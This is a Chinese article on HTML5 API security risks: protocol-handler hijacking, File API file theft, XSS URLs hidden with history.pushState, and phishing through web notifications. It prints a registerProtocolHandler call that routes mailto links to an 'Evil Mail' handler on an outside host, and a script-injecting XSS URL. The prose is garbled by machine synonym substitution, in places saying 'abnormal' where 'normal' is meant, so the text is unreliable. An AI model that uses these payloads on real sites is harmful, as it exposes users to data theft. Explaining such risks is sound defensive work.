HTML5安全风险详析之六:API攻击


  本文标签:HTML5安全 API攻击

HTML5里有许多 协定、模式和API,可能成为 突击者的 突击 路径  。

一、registerProtocolHandler:信息 透露

HTML5同意某些 协定和schema注册为新的 特点  。例如下面的语句 可以注册一个email handler  。

  1. 01.navigator.registerProtocolHandler(“mailto”,“http://www.f.com/?uri=%s", “Evil Mail");  

它会将一个 歹意网站 解决器关联到mailto这个 协定上,所以它在某些状况下的滥用会招致消费者信息 透露  。

二、文件API:窃取文件

HTML5另外一些API从安全角度来看很故意思,它们还能混合起来 使用  。

例如文件API同意阅读器 拜访当地文件, 突击者 可以将它与点击劫持和 其余 突击混合起来 获得消费者当地的文件  。 比方骗取你从当地拖放文件到页面里,这种 步骤在劫持 突击一文中有较 详尽的 阐述  。

三、历史API: 潜藏XSS URL

利用HTML5历史API的pushState, 可以 潜藏阅读器地址栏的 突击URL  。例如我在阅读器地址栏输入

  1. 01.http://test.baidu.com/?text=div><script>history.pushState({},,location.href.split("?").shift());document.write(1)script>  

这个地址,消费者将会仅仅只看到http://test.baidu.com/  。

这个问题和现在 风行的短网址技术 联合起来, 存在更大的 隐秘性  。 设想一下我们在微博上看到一个短网址,不会有任何 嫌疑就会点击这个地址查看内容,而最终看到的地址也是相当 畸形的,然而在这个过程中消费者的信息和 材料就 神不知,鬼不觉被盗取了  。

短URL 联合历史API的 突击

四、Web Notifications:盗取数据

Web Notifications让我们在阅读器中 可以 接纳推送的 信息 告诉,然而它有可能会被 突击者利用来 构造 虚假信息,骗取消费者数据  。

例如下图里右下角的弹窗 告诉看起来十分 畸形,需求我们输入Gmail密码来登录查看新邮件  。然而一旦输入密码,Gmail邮箱就被盗取了  。我们 可以 细心看看,弹窗左上角显示的域名是gmai1.com!这正是一个钓鱼网站的欺诈 目的  。

桌面 告诉 突击

最终,随着HTML5的进展, 将来还可能浮现新的HTML5安全问题,还可能还会向着复杂化和智能化去进展  。